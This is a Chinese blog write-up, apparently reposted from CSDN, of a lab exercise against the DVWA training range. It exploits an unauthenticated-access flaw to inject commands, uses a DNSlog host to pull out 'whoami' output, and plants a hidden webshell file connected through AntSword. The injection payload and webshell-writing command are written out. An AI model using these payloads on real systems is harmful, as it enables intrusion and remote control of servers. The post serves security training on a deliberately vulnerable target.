记一次实现DVWA无用户密码登录后台实验
漏洞复现:dvwa_<2.0.1_unauth-access
漏洞描述:DVWA 是一个基于*AMP综合性Web应用漏洞靶场,帮助安全人员测似他们的技能和工具,帮助Web开发人员更好地了解Web 应用程序的过程,帮助学生和教师再受控教室环境中学习Web 应用程序安全。
DVWA 的目的的通过简单直观的界面来实践一些常见的Web漏洞,漏洞的不同程度的难度,分别为:初级、中级、高级和完全防御,分别对应目录中的low.php、medium.php、high.php和impossible.php
DVWA 在使用过程中需要登录,默认账号和密码:admin/password
DVWA 在2.0.1版本中,存在未授权访问漏洞,攻击者利用此漏洞能够直接访问漏洞源码文件,例如:low.php等。可导致在未登录的情况下,可以直接利用漏洞,如:命令注入漏洞
影响版本:DVWA 2.0.1版本
基础环境:
组件 | 版本 |
---|---|
OS | Windows Server 2016 |
Web Server | phpStudy 2016(特别版) |
Source Code | DVWA 2.0.1 |
漏洞验证:打开DVWA之后输入漏洞源码文件地址
/vulnerabilities/exec/source/
验证此漏洞不需要自己搭建漏洞,直接点击 555 即可访问,进行验证
实验步骤:
-
进入靶场登录界面,在不输入用户名和密码的情况下,输入漏洞源码文件地址,发现能够进入,验证有此漏洞。
-
深度利用,使用burpsuite 查看是否能执行一些远程命令
-
比如使用burpsuite抓包后,将GET改为POST发送数据,用DNSlog平台,生成一个外带注入编码,通过此平台来验证漏洞存在性。
-图:
-
打开之后,点击左边的Get SubDomain生成外带注入编码,复制,并使用以下命令
-
-
ip=127.0.0.0.1%7Cping+-c+1+`whoami`.v5xawm.dnslog.cn&Submit=Submit
- 图:
-
上述命令成功后,回到DNSlog
-
-
发现能够执行,进行一句话木马上传,并使用蚁剑连接后台
echo+""+>+../../../hackable/uploads/.new_boy.php
-
通过注入,实现远程命令执行,上传隐藏new_boy文件
-
-
注入成功,回到靶机输入
-
在浏览器输入:52.195.7.186/hackable==========================================注意:如果输入上述代码出错,无法访问。出现了dvwa.local.这是由于你的服务器的DNS无法解析靶机DNS。打开终端,输入:vi /etc/hosts将靶机的IP添加进去,即可看见刚才写入成功的php文件
- 图:
- 图:
-
再次打开浏览器,输入/hackable/即可,以下图解。这是一步一步,你也可以直接输入
-
http://dvwa.local/hackable/uploads/.new_boy.php
-
-
-
也可以在实验前,输入一个自己原本要上传的php文件,查看是否有你准备创建的文件,如若没有再进行上述操作
- 打开蚁剑,进入后台
- 复制自己的php文件路径
- 输入密码,也就是刚才一句话木马里的数字:123456
- 登录成功
-
以下是图例:
-
-
- 打开蚁剑,进入后台
-
-
创建文件,重新进入,看是否创建成功!
.
- 成功!
来源地址:https://blog.csdn.net/weixin_55404107/article/details/127333617